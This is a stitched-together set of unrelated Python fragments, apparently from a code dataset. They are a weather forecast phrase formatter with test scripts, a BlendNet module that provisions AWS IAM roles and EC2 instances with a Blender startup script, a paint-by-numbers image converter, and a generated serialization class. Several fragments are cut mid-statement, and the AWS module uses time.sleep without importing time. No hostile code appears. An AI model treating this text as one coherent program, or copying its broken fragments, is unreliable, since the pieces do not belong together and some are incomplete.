("Period_6_14", 12),
]
return [
("Morning", self.DAY(), self.NIGHT(), self.NIGHT(),
".TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Morning with Pre-1st Period", self.DAY()-2, self.NIGHT(), self.NIGHT(),
".TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Morning Update", "issuanceHour", self.NIGHT(), self.NIGHT(),
".REST OF TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Afternoon Update", "issuanceHour", self.NIGHT(), self.NIGHT(),
".REST OF TODAY...", "early in the morning","late in the afternoon",
1, seriesDefAM),
# End times are tomorrow:
("Afternoon", self.NIGHT(), 24 + self.DAY(), 24 + self.DAY(),
".TONIGHT...", "late in the night", "early in the evening",
1, seriesDefPM),
("Afternoon with Pre-1st Period", self.NIGHT()-2, 24 + self.DAY(), 24 + self.DAY(),
".TONIGHT...", "late in the night", "early in the evening",
1, seriesDefPM),
("Evening Update", "issuanceHour", 24 + self.DAY(), 24 + self.DAY(),
".REST OF TONIGHT...", "early in the morning","early in the evening",
1, seriesDefPM),
# For the early morning update, this produces:
# Rest of Tonight:
# Monday
# Monday Night
("Early Morning Update", "issuanceHour", self.DAY(), self.DAY(),
".REST OF TONIGHT...", "early in the morning","late in the afternoon",
0, seriesDefPM),
# Alternative
# For the early morning update, this produces:
# Early This Morning:
# Today
# Tonight
#("Evening Update", "issuanceHour", 24 + self.DAY(), 24 + self.DAY(),
# ".REST OF TONIGHT...", "late in the night", "early in the evening",
# 1, seriesDefPM),
#("Early Morning Update", "issuanceHour", self.DAY(), self.DAY(),
# ".EARLY THIS MORNING...", "early in the morning", "late in the afternoon",
# 1, seriesDefPM),
]
def Period_2_3(self):
# No Lake Wind phrase
component = {
"type": "component",
"methodList": [
self.orderPhrases,
self.consolidateSubPhrases,
self.assemblePhrases,
self.wordWrap,
],
"analysisList": [
#("MinT", self.avg),
#("MaxT", self.avg),
("MinT", self.stdDevMinMax),
("MaxT", self.stdDevMinMax),
("T", self.hourlyTemp),
("T", self.minMax),
("Sky", self.median, [3]),
("PoP", self._PoP_analysisMethod("Period_2_3"), [6]),
("PoP", self.binnedPercent, [6]),
("SnowAmt", self.accumMinMax),
("StormTotalSnow", self.accumMinMax),
("IceAccum", self.accumMinMax),
("SnowLevel", self.avg),
("Wind", self.vectorMedianRange, [6]),
("Wind", self.vectorMinMax, [6]),
("WindGust", self.maximum, [6]),
("Wx", self.rankedWx, [6]),
("WindChill", self.minMax, [6]),
("HeatIndex", self.minMax, [6]),
],
"phraseList":[
self.wind_summary,
self.reportTrends,
self.sky_phrase,
self.skyPopWx_phrase,
self.weather_phrase,
self.severeWeather_phrase,
self.heavyPrecip_phrase,
self.visibility_phrase,
self.snow_phrase,
self.total_snow_phrase,
self.snowLevel_phrase,
self.iceAccumulation_phrase,
self.highs_phrase,
self.lows_phrase,
#self.highs_range_phrase,
#self.lows_range_phrase,
self.steady_temp_trends,
self.temp_trends,
self.wind_withGusts_phrase,
# self.lake_wind_phrase,
self.popMax_phrase,
self.windChill_phrase,
self.heatIndex_phrase,
],
}
if self._arealSkyAnalysis:
component["analysisList"].append(("Sky", self.binnedPercent, [6]))
if self._useStormTotalSnow:
phraseList = component["phraseList"]
index = phraseList.index(self.total_snow_phrase)
phraseList[index] = self.stormTotalSnow_phrase
component["phraseList"] = phraseList
return component
"""
import TestScript
scripts = [
### Temp phrases
{
"name": "Temp_50",
"commentary": """
MaxT -- 50
Steady temperatures.
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 50, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 50, "all"),
("Fcst", "T", "SCALAR", 9, 12, 50, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 50, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 50, ["BelowElev"]),
],
"checkStrings": ["Near steady temperature around 50"],
},
{
"name": "Temp_38-42",
"commentary": """
MaxT -- 38-42
Implied range terminology. NEAR and AROUND are defined as plus or
minus two degrees about a certain number.
For example, Lows AROUND 40 means 38 to 42 inclusive.
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 70, "all"),
("Fcst", "T", "SCALAR", 9, 12, 70, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 38, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 42, ["BelowElev"]),
],
"checkStrings": ["Highs around 40"],
},
{
"name": "Temp_50-53",
"commentary": """
MaxT -- 50-53
LOWER 50S (50, 51, 52, 53)
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 70, "all"),
("Fcst", "T", "SCALAR", 9, 12, 70, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 50, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 53, ["BelowElev"]),
],
"checkStrings": ["Highs in the lower 50s"],
},
{
"name": "Temp_54-56",
"commentary": """
MaxT -- 54-56
MID 50S (54, 55, 56)
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 70, "all"),
("Fcst", "T", "SCALAR", 9, 12, 70, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 54, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 56, ["BelowElev"]),
],
"checkStrings": ["Highs in the mid 50s"],
},
{
"name": "Temp_57-59",
"commentary": """
MaxT -- 57-59
UPPER 50S (57, 58, 59)
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 70, "all"),
("Fcst", "T", "SCALAR", 9, 12, 70, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 57, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 59, ["BelowElev"]),
],
"checkStrings": ["Highs in the upper 50s"],
},
{
"name": "Temp_47-52",
"commentary": """
MaxT -- 47-52
A specific range of five degrees (5 to 10 degrees in mountainous areas)
Lows 20 to 25
Highs 47 to 52
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, | |
<filename>BlendNet/providers/aws/__init__.py
'''Amazon Web Services
Provide API access to allocate required resources in AWS
Dependencies: aws cli v2 installed and configured auth
Help: https://github.com/state-of-the-art/BlendNet/wiki/HOWTO:-Setup-provider:-Amazon-Web-Services-(AWS)
'''
__all__ = [
'Processor',
'Manager',
'Agent',
'Instance',
]
# Exception to notify that the command returned exitcode != 0
class AwsToolException(Exception):
pass
import os
import sys
import json
import platform
import tempfile
import ssl
import site
import urllib
import subprocess
import pathlib
METADATA_URL = 'http://169.254.169.254/latest/'
LOCATION = None # If the script is running in the cloud
AWS_CONF = {}
AWS_EXEC_PREFIX = None
AWS_CONFIGS = None
def _requestMetadata(path, verbose = False):
req = urllib.request.Request(METADATA_URL+path)
try:
while True:
with urllib.request.urlopen(req, timeout=2) as res:
if res.getcode() == 503:
print('WARN: Unable to reach metadata serivce')
time.sleep(5)
continue
data = res.read()
try:
return data.decode('utf-8')
except (LookupError, UnicodeDecodeError):
# UTF-8 not worked, so probably it's latin1
return data.decode('iso-8859-1')
except Exception as e:
if verbose:
print('WARN: Metadata is not available ' + path)
return None
def checkLocation():
'''Returns True if it's the AWS environment'''
global LOCATION
if LOCATION is not None:
return LOCATION
LOCATION = _requestMetadata('', True) is not None
return LOCATION
def _executeAwsTool(*args, data=None):
'''Runs the aws tool and returns code and data as tuple, data will be sent to stdin as bytes'''
to_run = AWS_EXEC_PREFIX
if args[0] == 's3' and '--region' in AWS_EXEC_PREFIX:
to_run = to_run[:-2]
result = subprocess.run(to_run + args,
input=data,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if result.returncode != 0:
raise AwsToolException('AWS tool returned %d during execution of "%s": %s' % (
result.returncode, AWS_EXEC_PREFIX + args, result.stderr))
data = None
try:
data = json.loads(result.stdout)
except UnicodeDecodeError as e:
print('WARN: Found UnicodeDecodeError during parsing the aws output, switching to ISO-8859-1:', str(e))
data = json.loads(result.stdout.decode('iso-8859-1'))
except json.decoder.JSONDecodeError:
pass
return data
def initProvider(settings = dict()):
'''Init provider configuration'''
from .. import findPATHExec
global AWS_CONF
AWS_CONF = settings
if not AWS_CONF.get('aws_tool_path'):
AWS_CONF['aws_tool_path'] = findPATHExec('aws')
if not AWS_CONF['aws_tool_path']:
return 'Unable to find "aws" in PATH - check the provider documentation and install the requirements'
if not os.path.isfile(AWS_CONF['aws_tool_path']):
path = AWS_CONF['aws_tool_path']
AWS_CONF['aws_tool_path'] = None
return 'The provided "aws" exec path is invalid: %s' % (path,)
global AWS_EXEC_PREFIX, AWS_CONFIGS
AWS_EXEC_PREFIX = (AWS_CONF['aws_tool_path'], '--output', 'json')
AWS_CONFIGS = None
configs = _getConfigs()
if not configs:
AWS_CONF['aws_tool_path'] = None
return 'Error during execution of "aws" tool'
print('INFO: Using aws tool:', AWS_CONF['aws_tool_path'])
if 'region' in configs:
print('INFO: Set region for aws tool: ' + configs['region'])
AWS_EXEC_PREFIX += ('--region', configs['region'])
return True
def checkDependencies(settings):
if not AWS_CONF.get('aws_tool_path'):
return initProvider(settings)
return True
def getSettings():
'''Returns the available settings of the provider'''
return {
'aws_exec_path': {
'name': 'Path to aws exec',
'description': 'Full path to the aws or aws.exe from AWS CLI v2, by default uses PATH env to find it',
'type': 'path',
'value': AWS_CONF.get('aws_tool_path'),
},
'bucket_name': {
'name': 'Bucket name',
'description': '''What the bucket to use - in case it's empty will create the new one as "blendnet-{session_id}"''',
'type': 'string',
'value': AWS_CONF.get('bucket_name', ''),
},
}
def _getConfigs():
'''Returns dict with aws tool configs'''
global AWS_CONFIGS
if not AWS_CONFIGS:
configs = dict()
# aws configure returns non-json table, so using direct call
result = subprocess.run([AWS_CONF['aws_tool_path'], 'configure', 'list'], stdout=subprocess.PIPE)
if result.returncode != 0:
print('ERROR: Unable to get aws config: %s %s' % (result.returncode, result.stdout))
return configs
data = result.stdout
try:
data = data.decode('utf-8').strip()
except (LookupError, UnicodeDecodeError):
# UTF-8 not worked, so probably it's latin1
data = data.decode('iso-8859-1').strip()
for line in data.split(os.linesep)[2:]:
param = line.split()[0]
result = subprocess.run([AWS_CONF['aws_tool_path'], 'configure', 'get', param], stdout=subprocess.PIPE)
if result.returncode == 0:
try:
configs[param] = result.stdout.decode('utf-8').strip()
except (LookupError, UnicodeDecodeError):
# UTF-8 not worked, so probably it's latin1
configs[param] = result.stdout.decode('iso-8859-1').strip()
if checkLocation():
print('INFO: Receiving configuration from the instance metadata')
json_data = _requestMetadata('dynamic/instance-identity/document')
data = None
if json_data is not None:
try:
data = json.loads(json_data)
except json.decoder.JSONDecodeError:
print('ERROR: Unable to parse the instance json metadata: %s' % json_data)
pass
if data is not None:
configs['region'] = configs.get('region', data['region'])
AWS_CONFIGS = configs
return AWS_CONFIGS
def getProviderInfo():
configs = dict()
try:
configs = _getConfigs()
useful_quotas = {
'Running On-Demand Standard (A, C, D, H, I, M, R, T, Z) instances': 'Std instances',
'Running On-Demand F instances': 'F instances',
'Running On-Demand G instances': 'G instances',
'Running On-Demand Inf instances': 'Inf instances',
'Running On-Demand P instances': 'P instances',
'Running On-Demand X instances': 'X instances',
}
# Get quotas
data = _executeAwsTool('service-quotas', 'list-service-quotas',
'--service-code', 'ec2', '--query', 'Quotas[].[QuotaName, Value]')
for q in data:
if q[0] in useful_quotas:
configs['Quota: ' + useful_quotas[q[0]]] = '%.1f' % (q[1],)
except AwsToolException as e:
configs['ERRORS'] = ['Looks like access to the API is restricted '
'- please check your permissions: %s' % e]
return configs
def getInstanceTypes():
try:
data = _executeAwsTool('ec2', 'describe-instance-types',
'--query', 'InstanceTypes[].[InstanceType, VCpuInfo.DefaultVCpus, MemoryInfo.SizeInMiB] | sort_by(@, &[0])')
return dict([ (d[0], ('%s vCPUs %s GB RAM' % (d[1], d[2]/1024.0), d[2]/1024.0)) for d in data ])
except AwsToolException as e:
return {'ERROR': 'Looks like access to the API is restricted '
'- please check your permissions: %s' % e}
return {}
def _createRoles():
'''Will ensure the required roles are here'''
role_doc = {
"Statement": [{
"Effect": "Allow",
"Principal": {
"Service":"ec2.amazonaws.com"
},
"Action":"sts:AssumeRole",
}],
}
# Create blendnet-agent role
try:
_executeAwsTool('iam', 'create-role',
'--role-name', 'blendnet-agent',
'--description', 'Automatically created by BlendNet',
'--assume-role-policy-document', json.dumps(role_doc))
_executeAwsTool('iam', 'wait', 'role-exists',
'--role-name', 'blendnet-agent')
print('INFO: Creating the instance profile for role blendnet-agent')
_executeAwsTool('iam', 'attach-role-policy',
'--role-name', 'blendnet-agent',
'--policy-arn', 'arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess')
_executeAwsTool('iam', 'create-instance-profile',
'--instance-profile-name', 'blendnet-agent')
_executeAwsTool('iam', 'add-role-to-instance-profile',
'--instance-profile-name', 'blendnet-agent',
'--role-name', 'blendnet-agent')
_executeAwsTool('iam', 'wait', 'instance-profile-exists',
'--instance-profile-name', 'blendnet-agent')
except AwsToolException as e:
if '(EntityAlreadyExists)' not in str(e):
raise
print('INFO: Role blendnet-agent already exists')
# Create blendnet-manager role
try:
_executeAwsTool('iam', 'create-role',
'--role-name', 'blendnet-manager',
'--description', 'Automatically created by BlendNet',
'--assume-role-policy-document', json.dumps(role_doc))
print('INFO: Creating the instance profile for role blendnet-manager')
_executeAwsTool('iam', 'wait', 'role-exists',
'--role-name', 'blendnet-manager')
# Those perms could be neared down - but I think it's too much for now
_executeAwsTool('iam', 'attach-role-policy',
'--role-name', 'blendnet-manager',
'--policy-arn', 'arn:aws:iam::aws:policy/AmazonEC2FullAccess')
_executeAwsTool('iam', 'attach-role-policy',
'--role-name', 'blendnet-manager',
'--policy-arn', 'arn:aws:iam::aws:policy/AmazonS3FullAccess')
# Allow blendnet-manager to use blendnet-agent instance profile and role
agent_instance_profile = _executeAwsTool('iam', 'get-instance-profile',
'--instance-profile-name', 'blendnet-agent',
'--query', 'InstanceProfile')
policy_doc = {
"Statement": [{
"Effect": "Allow",
"Action": "iam:PassRole",
"Resource": [
agent_instance_profile['Arn'],
agent_instance_profile['Roles'][0]['Arn'],
],
}],
}
_executeAwsTool('iam', 'put-role-policy',
'--role-name', 'blendnet-manager',
'--policy-name', 'allow_use_blendnet-agent',
'--policy-document', json.dumps(policy_doc))
_executeAwsTool('iam', 'create-instance-profile',
'--instance-profile-name', 'blendnet-manager')
_executeAwsTool('iam', 'add-role-to-instance-profile',
'--instance-profile-name', 'blendnet-manager',
'--role-name', 'blendnet-manager')
_executeAwsTool('iam', 'wait', 'instance-profile-exists',
'--instance-profile-name', 'blendnet-manager')
# If it's not wait - we will see the next error during manager allocation
# Value (blendnet-manager) for parameter iamInstanceProfile.name is invalid. Invalid IAM Instance Profile name
time.sleep(30)
except AwsToolException as e:
if '(EntityAlreadyExists)' not in str(e):
raise
print('INFO: Role blendnet-manager already exists')
def _getImageAmi(name = 'debian-10-amd64-daily-*'):
'''Gets the latest image per name filter'''
data = _executeAwsTool('ec2', 'describe-images',
'--filters', json.dumps([{'Name':'name','Values': [name]}]),
'--query', 'sort_by(Images, &CreationDate)[].[Name,ImageId,BlockDeviceMappings[0].DeviceName][-1]')
print('INFO: Got image %s' % (data[1],))
return (data[1], data[2])
def _getInstanceId(instance_name):
'''Gets the instance id based on the tag Name'''
data = _executeAwsTool('ec2', 'describe-instances',
'--filters', json.dumps([
{'Name':'tag:Name','Values': [instance_name]},
{'Name':'instance-state-name','Values': ['pending','running','shutting-down','stopping','stopped']},
]),
'--query', 'Reservations[].Instances[].InstanceId')
if len(data) != 1:
return None
return data[0]
def createInstanceManager(cfg):
'''Creating a new instance for BlendNet Manager'''
_createRoles()
inst_id = _getInstanceId(cfg['instance_name'])
if inst_id:
# The instance is already exists
return inst_id
image = _getImageAmi()
disk_config = [{
'DeviceName': image[1],
'Ebs': {
'DeleteOnTermination': True,
'VolumeSize': 200,
'VolumeType': 'standard',
},
}]
# TODO: make script overridable
# TODO: too much hardcode here
startup_script = '''#!/bin/sh
echo '--> Check for blender dependencies'
dpkg -l libxrender1 libxi6 libgl1
if [ $? -gt 0 ]; then
apt update
apt install --no-install-recommends -y libxrender1 libxi6 libgl1
fi
if [ ! -x /srv/blender/blender ]; then
echo '--> Download & unpack blender'
echo "{blender_sha256} -" > /tmp/blender.sha256
curl -fLs "{blender_url}" | tee /tmp/blender.tar.bz2 | sha256sum -c /tmp/blender.sha256 || (echo "ERROR: checksum of the blender binary is incorrect"; exit 1)
mkdir -p /srv/blender
tar -C /srv/blender --strip-components=1 --checkpoint=10000 --checkpoint-action=echo='Unpacked %{{r}}T' -xf /tmp/blender.tar.bz2
fi
cat <<'EOF' > /usr/local/bin/blendnet_cloud_init.sh
#!/bin/sh
echo '--> Update the BlendNet manager'
aws s3 cp --recursive '{storage_url}/work_manager' "$(getent passwd blendnet-user | cut -d: -f6)"
aws s3 rm --recursive '{storage_url}/work_manager'
aws s3 cp --recursive '{storage_url}/blendnet' /srv/blendnet
EOF
chmod +x /usr/local/bin/blendnet_cloud_init.sh
adduser --shell /bin/false --disabled-password blendnet-user
cat <<'EOF' > /etc/systemd/system/blendnet-manager.service
[Unit]
Description=BlendNet Manager Service
After=network-online.target google-network-daemon.service
[Service]
PermissionsStartOnly=true
User=blendnet-user
WorkingDirectory=~
Type=simple
ExecStartPre=/usr/local/bin/blendnet_cloud_init.sh
ExecStart=/srv/blender/blender -b -noaudio -P /srv/blendnet/manager.py
Restart=always
TimeoutStopSec=60
StandardOutput=syslog
StandardError=syslog
[Install]
WantedBy=multi-user.target
EOF
echo '--> Run the BlendNet manager'
systemctl daemon-reload
systemctl enable blendnet-manager.service
systemctl start blendnet-manager.service
'''.format(
blender_url=cfg['dist_url'],
blender_sha256=cfg['dist_checksum'],
storage_url=cfg['storage_url'],
)
options = [
'ec2', 'run-instances',
'--tag-specifications', 'ResourceType=instance,Tags=['
'{Key=Name,Value=%s},'
'{Key=Session,Value=%s},'
'{Key=Type,Value=manager}]' % (cfg['instance_name'], cfg['session_id']),
'--image-id', image[0],
'--instance-type', cfg['instance_type'],
'--iam-instance-profile', '{"Name":"blendnet-manager"}',
'--block-device-mappings', json.dumps(disk_config),
#'--key-name', 'default_key', # If you | |
# This converter has code borrowed from here:
# https://codegolf.stackexchange.com/questions/42217/paint-by-numbers
import random
import time
from collections import defaultdict
from argparse import ArgumentParser
from pathlib import Path
from PIL import Image
if __name__ == '__main__':
root_path = Path("converter_1")
parser = ArgumentParser()
parser.add_argument(
'--input', type=str, help='file with input image in RGB workspace',
metavar='INPUT_FILE', required=True)
parser.add_argument(
'--output', type=str, help='output file',
metavar='OUTPUT_FILE', required=False, default=root_path / "out")
parser.add_argument(
'--output-folder', type=str, help='output folder',
metavar='OUTPUT_FOLDER', required=False, default=root_path / "out-folder")
parser.add_argument(
'--p', type=int, help='P - maximum numbers of distinct colors in palette',
metavar='P_VAR', default=30)
parser.add_argument(
'--n', type=int, help='N - maximum number of cells to use',
metavar='N_VAR', default=500)
parser.add_argument(
'--verbose', type=int, help='Verbose flag - if true than each step produces an intermediate result',
metavar='VERBOSE', default=False)
parser.add_argument(
'--flood-fill-tolerance', type=int, help='Flood fill tolerance',
metavar='FFT_VAR', default=10)
parser.add_argument(
'--close-cell-tolerance', type=int, help='Close cell tolerance',
metavar='CCT_VAR', default=5)
parser.add_argument(
'--small-cell-threshold', type=int, help='Small cell threshold',
metavar='SMT_VAR', default=10)
parser.add_argument(
'--first-pass-n-ratio', type=float, help='First pass N ratio',
metavar='FPNR_VAR', default=1.5)
parser.add_argument(
'--k-means-trials', type=int, help='K-Means trial count',
metavar='KMEANS_VAR', default=30)
parser.add_argument(
'--blur-radius', type=int, help='Blur radius',
metavar='BLUR_RADIUS_VAR', default=2)
parser.add_argument(
'--blur-runs', type=int, help='Blur runs',
metavar='BLUR_RUNS_VAR', default=3)
args = parser.parse_args()
print(args)
INFILE = args.input
OUTFILE_STEM = str(args.output_folder)
OUTFILE = str(args.output)
P = args.p
N = args.n
OUTPUT_ALL = args.verbose # Whether to output the image at each step
FLOOD_FILL_TOLERANCE = args.flood_fill_tolerance
CLOSE_CELL_TOLERANCE = args.close_cell_tolerance
SMALL_CELL_THRESHOLD = args.small_cell_threshold
FIRST_PASS_N_RATIO = args.first_pass_n_ratio
K_MEANS_TRIALS = args.k_means_trials
BLUR_RADIUS = args.blur_radius
BLUR_RUNS = args.blur_runs
"""
Color conversion functions
"""
X = range
# http://www.easyrgb.com/?X=MATH
def rgb2xyz(rgb):
r, g, b = rgb
r /= 255
g /= 255
b /= 255
r = ((r + 0.055) / 1.055) ** 2.4 if r > 0.04045 else r / 12.92
g = ((g + 0.055) / 1.055) ** 2.4 if g > 0.04045 else g / 12.92
b = ((b + 0.055) / 1.055) ** 2.4 if b > 0.04045 else b / 12.92
r *= 100
g *= 100
b *= 100
x = r * 0.4124 + g * 0.3576 + b * 0.1805
y = r * 0.2126 + g * 0.7152 + b * 0.0722
z = r * 0.0193 + g * 0.1192 + b * 0.9505
return x, y, z
def xyz2lab(xyz):
x, y, z = xyz
x /= 95.047
y /= 100
z /= 108.883
x = x ** (1 / 3) if x > 0.008856 else 7.787 * x + 16 / 116
y = y ** (1 / 3) if y > 0.008856 else 7.787 * y + 16 / 116
z = z ** (1 / 3) if z > 0.008856 else 7.787 * z + 16 / 116
L = 116 * y - 16
a = 500 * (x - y)
b = 200 * (y - z)
return L, a, b
def rgb2lab(rgb):
return xyz2lab(rgb2xyz(rgb))
def lab2xyz(lab):
L, a, b = lab
y = (L + 16) / 116
x = a / 500 + y
z = y - b / 200
y = y ** 3 if y ** 3 > 0.008856 else (y - 16 / 116) / 7.787
x = x ** 3 if x ** 3 > 0.008856 else (x - 16 / 116) / 7.787
z = z ** 3 if z ** 3 > 0.008856 else (z - 16 / 116) / 7.787
x *= 95.047
y *= 100
z *= 108.883
return x, y, z
def xyz2rgb(xyz):
x, y, z = xyz
x /= 100
y /= 100
z /= 100
r = x * 3.2406 + y * -1.5372 + z * -0.4986
g = x * -0.9689 + y * 1.8758 + z * 0.0415
b = x * 0.0557 + y * -0.2040 + z * 1.0570
r = 1.055 * (r ** (1 / 2.4)) - 0.055 if r > 0.0031308 else 12.92 * r
g = 1.055 * (g ** (1 / 2.4)) - 0.055 if g > 0.0031308 else 12.92 * g
b = 1.055 * (b ** (1 / 2.4)) - 0.055 if b > 0.0031308 else 12.92 * b
r *= 255
g *= 255
b *= 255
return r, g, b
def lab2rgb(lab): rgb = xyz2rgb(lab2xyz(lab));return tuple([int(round(x)) for x in rgb])
"""
Stage 1: Read in image and convert to CIELAB
"""
total_time = time.time()
im = Image.open(INFILE)
width, height = im.size
if OUTPUT_ALL:
im.save(OUTFILE_STEM + "0.png")
print("Saved image %s0.png" % OUTFILE_STEM)
def make_pixlab_map(im):
width, height = im.size
pixlab_map = {}
for i in X(width):
for j in X(height):
pixlab_map[(i, j)] = rgb2lab(im.getpixel((i, j)))
return pixlab_map
pixlab_map = make_pixlab_map(im)
print("Stage 1: CIELAB conversion complete")
"""
Stage 2: Partitioning the image into like-colored cells using flood fill
"""
def d(color1, color2):
return (abs(color1[0] - color2[0]) ** 2 + abs(color1[1] - color2[1]) ** 2 + abs(color1[2] - color2[2]) ** 2) ** .5
def neighbours(pixel):
results = []
for neighbour in [(pixel[0] + 1, pixel[1]), (pixel[0] - 1, pixel[1]),
(pixel[0], pixel[1] + 1), (pixel[0], pixel[1] - 1)]:
if 0 <= neighbour[0] < width and 0 <= neighbour[1] < height:
results.append(neighbour)
return results
def flood_fill(start_pixel):
to_search = {start_pixel}
cell = set()
searched = set()
start_color = pixlab_map[start_pixel]
while to_search:
pixel = to_search.pop()
if d(start_color, pixlab_map[pixel]) < FLOOD_FILL_TOLERANCE:
cell.add(pixel)
unplaced_pixels.remove(pixel)
for n in neighbours(pixel):
if n in unplaced_pixels and n not in cell and n not in searched:
to_search.add(n)
else:
searched.add(pixel)
return cell
# These two maps are inverses, pixel/s <-> number of cell containing pixel
cell_sets = {}
pixcell_map = {}
unplaced_pixels = {(i, j) for i in X(width) for j in X(height)}
while unplaced_pixels:
start_pixel = unplaced_pixels.pop()
unplaced_pixels.add(start_pixel)
cell = flood_fill(start_pixel)
cellnum = len(cell_sets)
cell_sets[cellnum] = cell
for pixel in cell:
pixcell_map[pixel] = cellnum
print("Stage 2: Flood fill partitioning complete, %d cells" % len(cell_sets))
"""
Stage 3: Merge cells with less than a specified threshold amount of pixels to reduce the number of cells
Also good for getting rid of some noise
"""
def mean_color(cell, color_map):
L_sum = 0
a_sum = 0
b_sum = 0
for pixel in cell:
L, a, b = color_map[pixel]
L_sum += L
a_sum += a
b_sum += b
return L_sum / len(cell), a_sum / len(cell), b_sum / len(cell)
def remove_small(cell_size):
if len(cell_sets) <= N:
return
small_cells = []
for cellnum in cell_sets:
if len(cell_sets[cellnum]) <= cell_size:
small_cells.append(cellnum)
for cellnum in small_cells:
neighbour_cells = []
for cell in cell_sets[cellnum]:
for n in neighbours(cell):
neighbour_reg = pixcell_map[n]
if neighbour_reg != cellnum:
neighbour_cells.append(neighbour_reg)
closest_cell = max(neighbour_cells, key=neighbour_cells.count)
for cell in cell_sets[cellnum]:
pixcell_map[cell] = closest_cell
if len(cell_sets[closest_cell]) <= cell_size:
small_cells.remove(closest_cell)
cell_sets[closest_cell] |= cell_sets[cellnum]
del cell_sets[cellnum]
if len(cell_sets) <= N:
return
for cell_size in X(1, SMALL_CELL_THRESHOLD):
remove_small(cell_size)
if OUTPUT_ALL:
frame_im = Image.new("RGB", im.size)
for cellnum in cell_sets:
cell_color = mean_color(cell_sets[cellnum], pixlab_map)
for pixel in cell_sets[cellnum]:
frame_im.putpixel(pixel, lab2rgb(cell_color))
frame_im.save(OUTFILE_STEM + "1.png")
print("Saved image %s1.png" % OUTFILE_STEM)
print("Stage 3: Small cell merging complete, %d cells" % len(cell_sets))
"""
Stage 4: Close color merging
"""
cell_means = {}
for cellnum in cell_sets:
cell_means[cellnum] = mean_color(cell_sets[cellnum], pixlab_map)
n_graph = defaultdict(set)
for i in X(width):
for j in X(height):
pixel = (i, j)
cell = pixcell_map[pixel]
for n in neighbours(pixel):
neighbour_cell = pixcell_map[n]
if neighbour_cell != cell:
n_graph[cell].add(neighbour_cell)
n_graph[neighbour_cell].add(cell)
def merge_cells(merge_from, merge_to):
merge_from_cell = cell_sets[merge_from]
for pixel in merge_from_cell:
pixcell_map[pixel] = merge_to
del cell_sets[merge_from]
del cell_means[merge_from]
n_graph[merge_to] |= n_graph[merge_from]
n_graph[merge_to].remove(merge_to)
for n in n_graph[merge_from]:
n_graph[n].remove(merge_from)
if n != merge_to:
n_graph[n].add(merge_to)
del n_graph[merge_from]
cell_sets[merge_to] |= merge_from_cell
cell_means[merge_to] = mean_color(cell_sets[merge_to], pixlab_map)
# Go through the cells from largest to smallest. Keep replenishing the list while we can still merge.
last_time = time.time()
to_search = sorted(cell_sets.keys(), key=lambda x: len(cell_sets[x]), reverse=True)
full_list = True
while len(cell_sets) > N and to_search:
if time.time() - last_time > 15:
last_time = time.time()
print("Close color merging... (%d cells remaining)" % len(cell_sets))
while to_search:
cellnum = to_search.pop()
close_cells = []
for neighbour_cellnum in n_graph[cellnum]:
if d(cell_means[cellnum], cell_means[neighbour_cellnum]) < CLOSE_CELL_TOLERANCE:
close_cells.append(neighbour_cellnum)
if close_cells:
for neighbour_cellnum in close_cells:
merge_cells(neighbour_cellnum, cellnum)
if | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
# python imports
import sys
import struct
from enum import Enum
PY3 = sys.version_info > (3,)
class EColor(Enum):
White = 0
Red = 3
Green = 4
Blue = -2
Black = -1
class Parent(object):
@staticmethod
def name():
return 'Parent'
def __init__(self, first_name=None, _last_name_=None):
self.initialize(first_name, _last_name_)
def initialize(self, first_name=None, _last_name_=None):
self.first_name = first_name
self._last_name_ = _last_name_
def serialize(self):
s = b''
# serialize self.first_name
s += b'\x00' if self.first_name is None else b'\x01'
if self.first_name is not None:
tmp0 = b''
tmp0 += struct.pack('I', len(self.first_name))
while len(tmp0) and tmp0[-1] == b'\x00'[0]:
tmp0 = tmp0[:-1]
s += struct.pack('B', len(tmp0))
s += tmp0
s += self.first_name.encode('ISO-8859-1') if PY3 else self.first_name
# serialize self._last_name_
s += b'\x00' if self._last_name_ is None else b'\x01'
if self._last_name_ is not None:
tmp1 = b''
tmp1 += struct.pack('I', len(self._last_name_))
while len(tmp1) and tmp1[-1] == b'\x00'[0]:
tmp1 = tmp1[:-1]
s += struct.pack('B', len(tmp1))
s += tmp1
s += self._last_name_.encode('ISO-8859-1') if PY3 else self._last_name_
return s
def deserialize(self, s, offset=0):
# deserialize self.first_name
